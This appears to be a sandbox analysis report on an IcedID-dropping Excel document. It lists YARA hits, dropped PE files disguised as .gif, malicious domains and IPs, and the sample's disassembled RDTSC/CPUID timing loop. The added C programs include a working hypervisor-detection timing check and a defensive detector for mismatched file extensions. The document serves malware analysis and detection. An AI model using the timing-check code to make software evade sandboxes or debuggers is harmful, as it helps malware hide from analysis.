Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000000141C95 second address: 0000000000141C52 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a sub eax, ecx 0x0000000c dec esp 0x0000000d add esi, eax 0x0000000f dec ecx 0x00000010 sub edi, 01h 0x00000013 jne 00007F47E0EA1114h 0x00000015 call dword ptr [0000245Eh] 0x0000001b jmp 00007F47E0EA1178h 0x0000001d jmp dword ptr [000925C2h] 0x00000023 dec eax 0x00000024 sub esp, 28h 0x00000027 dec eax 0x00000028 lea ecx, dword ptr [esp+30h] 0x0000002c call dword ptr [00046D21h] 0x00000032 dec eax 0x00000033 mov dword ptr [esp+08h], ecx 0x00000037 dec eax 0x00000038 sub esp, 18h 0x0000003b dec eax 0x0000003c test ecx, ecx 0x0000003e je 00007F47E0EDBE5Dh 0x00000044 dec esp 0x00000046 mov eax, dword ptr [00000030h] 0x0000004d xor eax, eax 0x0000004f dec eax 0x00000050 mov dword ptr [esp+08h], eax 0x00000054 dec ecx 0x00000055 mov edx, dword ptr [eax+000014A0h] 0x0000005b dec eax 0x0000005c mov dword ptr [esp+08h], edx 0x00000060 dec eax 0x00000061 test edx, edx 0x00000063 jne 00007F47E0EBA66Ch 0x00000069 mov eax, C00000BBh 0x0000006e mov dword ptr [esp], eax 0x00000071 jmp 00007F47E0EA1172h 0x00000073 jmp 00007F47E0EA1172h 0x00000075 dec eax 0x00000076 mov dword ptr [ecx], edx 0x00000078 dec eax 0x00000079 add esp, 18h 0x0000007c ret 0x0000007d test eax, eax 0x0000007f jns 00007F47E0EC10DFh 0x00000085 call dword ptr [00046D5Bh] 0x0000008b dec esp 0x0000008c mov edx, ecx 0x0000008e mov eax, 00000043h
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00231B94 rdtsc 3_2_00231B94
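Reading the interceptor listings above: the sandbox decoded the bytes as 32-bit code, so the 0x48, 0x49 and 0x4C bytes shown as dec eax, dec ecx and dec esp are really REX prefixes of 64-bit instructions (consistent with the PE32+ payloads this document drops). Decoded as x86-64, the pair after each rdtsc is shl rdx, 32 / or rax, rdx, which assembles the 64-bit timestamp. The loop then runs rdtsc; cpuid (eax = 1); rdtsc and accumulates the difference in one register, follows it with two back-to-back rdtsc reads accumulated in a second register as a baseline, and decrements a counter (sub ..., 1 / jne) until enough samples are collected. CPUID exits to the hypervisor unconditionally under Intel VT-x (and under AMD-V whenever the hypervisor intercepts it, which mainstream hypervisors do), so its average cost relative to the bare rdtsc pair is far larger inside a VM than on bare metal. The C program below is an added example written for this page, not code from the sample or the sandbox; it reproduces the measurement with GCC/Clang intrinsics. The 1000-cycle threshold and the iteration count are assumptions, since the sample's own comparison is not in the excerpt.

```c
/* Added example: RDTSC/CPUID timing check of the kind seen in the rundll32.exe
 * listing above. Reimplemented for illustration; not the sample's code.
 * Assumes GCC or Clang on x86/x86-64 (for __rdtsc and the __cpuid macro). */
#include <stdint.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>   /* __rdtsc() */
#include <cpuid.h>       /* __cpuid(level, a, b, c, d) macro */
#define HAVE_X86_TIMING 1
#else
#define HAVE_X86_TIMING 0
#endif

/* Accumulated cycle counts over all iterations, mirroring the two accumulator
 * registers in the disassembly (one for CPUID, one for the RDTSC-pair baseline). */
struct timing_sums {
    uint64_t cpuid_cycles;     /* sum of (rdtsc; cpuid; rdtsc) deltas */
    uint64_t baseline_cycles;  /* sum of (rdtsc; rdtsc) deltas */
};

/* Runs the sampling loop. Returns 0 on success, -1 when not on x86
 * (counters are then left at zero). */
int measure_timing(unsigned iterations, struct timing_sums *out)
{
    out->cpuid_cycles = 0;
    out->baseline_cycles = 0;
#if HAVE_X86_TIMING
    for (unsigned i = 0; i < iterations; i++) {
        unsigned a, b, c, d;
        uint64_t t0 = __rdtsc();
        __cpuid(1, a, b, c, d);          /* leaf 1: forces a VM exit under VT-x */
        uint64_t t1 = __rdtsc();
        out->cpuid_cycles += t1 - t0;

        uint64_t t2 = __rdtsc();         /* baseline: cost of RDTSC itself */
        uint64_t t3 = __rdtsc();
        out->baseline_cycles += t3 - t2;
        (void)a; (void)b; (void)c; (void)d;
    }
    return 0;
#else
    (void)iterations;
    return -1;
#endif
}

/* Decision rule: average net CPUID cost above threshold_cycles means a
 * hypervisor is probably intercepting CPUID. Returns 1 (virtualized),
 * 0 (bare metal) or -1 (no data). The threshold is an assumption for this
 * example; the sample's own threshold is not visible in the listing. */
int classify_timing(uint64_t cpuid_cycles, uint64_t baseline_cycles,
                    unsigned iterations, uint64_t threshold_cycles)
{
    if (iterations == 0) return -1;
    uint64_t avg_cpuid = cpuid_cycles / iterations;
    uint64_t avg_base  = baseline_cycles / iterations;
    uint64_t net = avg_cpuid > avg_base ? avg_cpuid - avg_base : 0;
    return net > threshold_cycles ? 1 : 0;
}

int main(void)
{
    struct timing_sums s;
    const unsigned iterations = 1000;   /* assumed sample count */
    if (measure_timing(iterations, &s) != 0) {
        puts("not an x86 CPU; nothing measured");
        return 0;
    }
    int verdict = classify_timing(s.cpuid_cycles, s.baseline_cycles, iterations, 1000);
    printf("avg cpuid: %llu cycles, avg rdtsc pair: %llu cycles -> %s\n",
           (unsigned long long)(s.cpuid_cycles / iterations),
           (unsigned long long)(s.baseline_cycles / iterations),
           verdict == 1 ? "hypervisor likely" : "bare metal likely");
    return 0;
}
```

The "RDTSC instruction interceptor" rows are the sandbox instrumenting rdtsc execution; a sandbox that intercepts rdtsc can hand back adjusted timestamps, which is the standard counter to this check. On real hardware single deltas are noisy (frequency scaling, SMIs, migration between cores), which is why the sample sums over many iterations rather than trusting one reading.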
Contains functionality to query network adapter information
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 3_2_00231F94
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 6_2_00141F94
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 666
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\rundll32.exe Last function: Thread delayed (4 occurrences)
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 60000 ms (3 occurrences)
Note: the following memory strings matched the sandbox's virtualization keyword list ("VMware"), but they are fragments of the aws.amazon.com homepage HTML held in rundll32.exe memory, consistent with the aws.amazon.com domain query and the connection to the CloudFront address 143.204.3.74 listed below. They are web content, not evasion code, and should not be read as an additional anti-VM indicator.
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-txt-white lb-h3 lb-title"> VMware Cloud on AWS</h3>
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp Binary or memory string: <a style="padding-left:30px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp Binary or memory string: <img src="//d1.awsstatic.com/webteam/homepage/Hybrid%20Solutions/VMWareCloud_Icon.55cb0bcef2c74b55acdb7155e3524e4b5436ec6e.png" alt="VMWareCloud_Icon" title="VMWareCloud_Icon" class="cq-dd-image" />
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp Binary or memory string: Migrate and extend VMware environments to the AWS Cloud
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp Binary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> VMware Cloud on AWS<span>Build a hybrid cloud without custom hardware</span> </a>
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp Binary or memory string: <a style="padding-left:20px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
Source: rundll32.exe, 00000003.00000003.2357744381.0000000002F87000.00000004.00000001.sdmp Binary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> Amazon RDS on VMware<span>Automate on-premises database management</span> </a>

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00231B94 rdtsc 3_2_00231B94

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exe Network Connect: 143.204.3.74 187
Source: C:\Windows\System32\rundll32.exe Domain query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe Domain query: aws.amazon.com
Source: C:\Windows\System32\rundll32.exe Domain query: usaaforced.fun
Source: rundll32.exe, 00000003.00000002.2497854303.0000000000890000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000003.00000002.2497854303.0000000000890000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000003.00000002.2497854303.0000000000890000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_00231D48 LookupAccountNameW, 3_2_00231D48

Stealing of Sensitive Information:

Yara detected IcedID
Source: Yara match File source: 00000003.00000002.2497781112.000000000038E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2174963879.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2172023641.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2173003375.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2497738687.00000000002E1000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2173701556.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2172513544.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2796, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2540, type: MEMORY

Remote Access Functionality:

Yara detected IcedID
Source: Yara match File source: 00000003.00000002.2497781112.000000000038E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2174963879.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2172023641.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2173003375.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2497738687.00000000002E1000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2173701556.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2172513544.00000000002E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2796, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2540, type: MEMORY
Behavior Graph (ID: 382871, Sample: document-1251000362.xlsm, Startdate: 06/04/2021, Architecture: WINDOWS, Score: 100)

Top-level signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Document exploit detected (drops PE files); 9 other signatures
Top-level domains: usaaforced.fun; tvorartificialnature.xyz

EXCEL.EXE started (87 registry values created, 52 files created)
    Network: agenbolatermurah.com; partsapp.com.br 192.185.214.87:443 (source port 49168), UNIFIEDLAYER-AS-1US, United States; 3 other IPs or domains
    Dropped: C:\Users\user\ksjvoefv.skd3 (PE32+); C:\Users\user\ksjvoefv.skd (PE32+); C:\Users\user\AppData\Local\...\3003[1].gif (PE32+); 2 other malicious files
    Signature: Document exploit detected (UrlDownloadToFile)
    Started: rundll32.exe; rundll32.exe; rundll32.exe; 2 other processes
        rundll32.exe (first)
            Network: usaaforced.fun; aws.amazon.com; 3 other IPs or domains
            Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation; Contains functionality to detect hardware virtualization (CPUID execution measurement); Tries to detect virtualization through RDTSC time measurements
        rundll32.exe (second)
            Network: usaaforced.fun; tvorartificialnature.xyz; 2 other IPs or domains
    Signature attached to the aws.amazon.com node: Outdated Microsoft Office dropper detected
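The graph lists 3003[1].gif and ksjvoefv.skd as PE32+ images, which is what the "Drops files with a non-matching file extension" signature keys on: the extension says image or data, the first bytes say Windows executable. The C program below is an added example written for this page (not the sample's or the sandbox's code) that performs that check the way a triage script would: follow the DOS header's e_lfanew (offset 0x3C) to the PE signature, read the optional-header Magic (0x10B = PE32, 0x20B = PE32+), and flag any PE whose extension is not one that legitimately carries PE code. The list of executable extensions is an assumption for this example.

```c
/* Added example: detect PE content hiding behind a non-executable extension,
 * as with the 3003[1].gif and ksjvoefv.skd files dropped by this document.
 * Illustration only; not code from the sample or the sandbox. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>

enum pe_kind { PE_NONE = 0, PE_32 = 1, PE_32PLUS = 2 };

static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Classifies a buffer holding the start of a file. Checks the 'MZ' DOS
 * header, follows e_lfanew at offset 0x3C to the 'PE\0\0' signature, skips
 * the 20-byte COFF header and reads the optional-header Magic field. */
enum pe_kind classify_pe(const unsigned char *buf, size_t len)
{
    if (len < 0x40 || buf[0] != 'M' || buf[1] != 'Z') return PE_NONE;
    uint32_t e_lfanew = rd32(buf + 0x3C);
    /* need signature (4) + COFF header (20) + Magic (2) = 26 bytes */
    if (e_lfanew > len || len - e_lfanew < 26) return PE_NONE;
    const unsigned char *p = buf + e_lfanew;
    if (memcmp(p, "PE\0\0", 4) != 0) return PE_NONE;
    uint16_t magic = (uint16_t)(p[24] | (p[25] << 8));
    if (magic == 0x10B) return PE_32;
    if (magic == 0x20B) return PE_32PLUS;
    return PE_NONE;
}

static int ext_equals(const char *a, const char *b)
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return 0;
    return *a == *b;
}

/* Extensions that legitimately hold PE images (assumed list for this example). */
static const char *const pe_exts[] = { ".exe", ".dll", ".sys", ".ocx", ".scr",
                                       ".cpl", ".drv", ".efi", NULL };

/* Returns 1 when the content is a PE but the file name's extension is not an
 * executable one (or there is no extension), 0 otherwise. */
int extension_mismatch(const char *name, const unsigned char *buf, size_t len)
{
    if (classify_pe(buf, len) == PE_NONE) return 0;
    const char *dot = strrchr(name, '.');
    if (!dot) return 1;
    for (int i = 0; pe_exts[i]; i++)
        if (ext_equals(dot, pe_exts[i])) return 0;
    return 1;
}

/* Reads the head of a file from disk and reports a verdict on stdout. */
int check_file(const char *path)
{
    unsigned char head[4096];
    FILE *f = fopen(path, "rb");
    if (!f) { perror(path); return -1; }
    size_t n = fread(head, 1, sizeof head, f);
    fclose(f);
    enum pe_kind k = classify_pe(head, n);
    int mismatch = extension_mismatch(path, head, n);
    printf("%s: %s%s\n", path,
           k == PE_32PLUS ? "PE32+" : k == PE_32 ? "PE32" : "not PE",
           mismatch ? " (extension does not match content)" : "");
    return mismatch;
}

int main(int argc, char **argv)
{
    int flagged = 0;
    for (int i = 1; i < argc; i++)
        if (check_file(argv[i]) == 1) flagged++;
    return flagged ? 1 : 0;
}
```

Run it over the sandbox's dropped-file directory (or a user profile on a suspect host); it exits non-zero when any PE is found under an image or data extension.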

Contacted Public IPs

IP              Domain                        Country        ASN     ASN Name                  Malicious
50.87.146.86    columbia.aula-web.net         United States  46606   UNIFIEDLAYER-AS-1US       false
199.79.62.99    tajushariya.com               United States  394695  PUBLIC-DOMAIN-REGISTRYUS  false
192.185.214.87  partsapp.com.br               United States  46606   UNIFIEDLAYER-AS-1US       false
143.204.3.74    dr49lng3n1n2s.cloudfront.net  United States  16509   AMAZON-02US               false
192.185.48.186  metaflip.io                   United States  46606   UNIFIEDLAYER-AS-1US       false

Private

IP
192.168.2.255

Contacted Domains

Name IP Active
metaflip.io 192.185.48.186 true
tajushariya.com 199.79.62.99 true
columbia.aula-web.net 50.87.146.86 true
dr49lng3n1n2s.cloudfront.net 143.204.3.74 true
partsapp.com.br 192.185.214.87 true
agenbolatermurah.com unknown unknown
usaaforced.fun unknown unknown
tvorartificialnature.xyz unknown unknown
aws.amazon.com unknown unknown